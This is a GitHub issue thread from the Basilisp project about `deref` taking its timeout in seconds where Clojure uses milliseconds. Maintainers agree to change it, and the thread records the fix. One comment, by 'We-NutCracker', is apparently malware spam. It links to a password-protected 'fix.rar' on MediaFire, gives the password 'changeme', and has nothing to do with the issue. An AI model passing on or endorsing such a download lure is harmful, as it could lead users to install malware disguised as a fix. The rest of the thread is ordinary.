### ISSUE TITLE
clojure compatibility: `basilisp.core/deref` timeout unit

### ISSUE THREAD

**Issue by ikappaki** [basilisp-lang/basilisp#1007]
Hi,

there appears to be a discrepancy in the timeout measurement units in  `basilisp.core/deref`  and `clojure.core/deref`.

`basilisp.core/deref` uses in [seconds for the timeout](https://basilisp.readthedocs.io/en/latest/api/core.html) :
> If o is an object implementing [basilisp.lang.interfaces.IBlockingDeref](https://basilisp.readthedocs.io/en/latest/interfaces.html#basilisp.lang.interfaces.IBlockingDeref) and timeout-s and timeout-val are supplied, deref will wait at most timeout-s seconds, returning timeout-val if timeout-s seconds elapse and o has not returned

`clojure.core/deref` uses [milliseconds for the timeout](https://clojuredocs.org/clojure.core/deref):
> ... The variant taking a timeout can be
used for blocking references (futures and promises), and will return
timeout-val if the timeout (in milliseconds) is reached before a
value is available. See also - realized?.

This difference is important, as it could confuse people familiar with Clojure or cause issues when porting existing programs, leading to subtle and unexpected behavior.

I don't believe there is an implementation obstacle preventing Basilisp from using milliseconds, though I haven't verified this. 

Would it be possible to update this to `milliseconds` for compatibility at this stage of development? Alternatively, should I update [the difference form Clojure](https://basilisp.readthedocs.io/en/latest/differencesfromclojure.html) section in the documentation to reflect this difference?

Thanks

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by ikappaki** [comment]
> @ikappaki I think it would be fine to change the Basilisp code to expect milliseconds and then intercept the value [here](https://github.com/basilisp-lang/basilisp/blob/cc1c6fc4272c62854e657451553fc5102ed242d3/src/basilisp/lang/runtime.py#L1471) and convert it into a float using seconds for the underlying APIs.
> 
> We're still in 0.x releases so there's no guarantees of stability.

Great, let me have a go at it, unless you have plans to do so.

**Comment by chrisrink10** [comment]
> > @ikappaki I think it would be fine to change the Basilisp code to expect milliseconds and then intercept the value [here](https://github.com/basilisp-lang/basilisp/blob/cc1c6fc4272c62854e657451553fc5102ed242d3/src/basilisp/lang/runtime.py#L1471) and convert it into a float using seconds for the underlying APIs.
> > We're still in 0.x releases so there's no guarantees of stability.
> 
> Great, let me have a go at it, unless you have plans to do so.

Go ahead. Thanks!

**Comment by chrisrink10** [comment]
Fixed in #1008
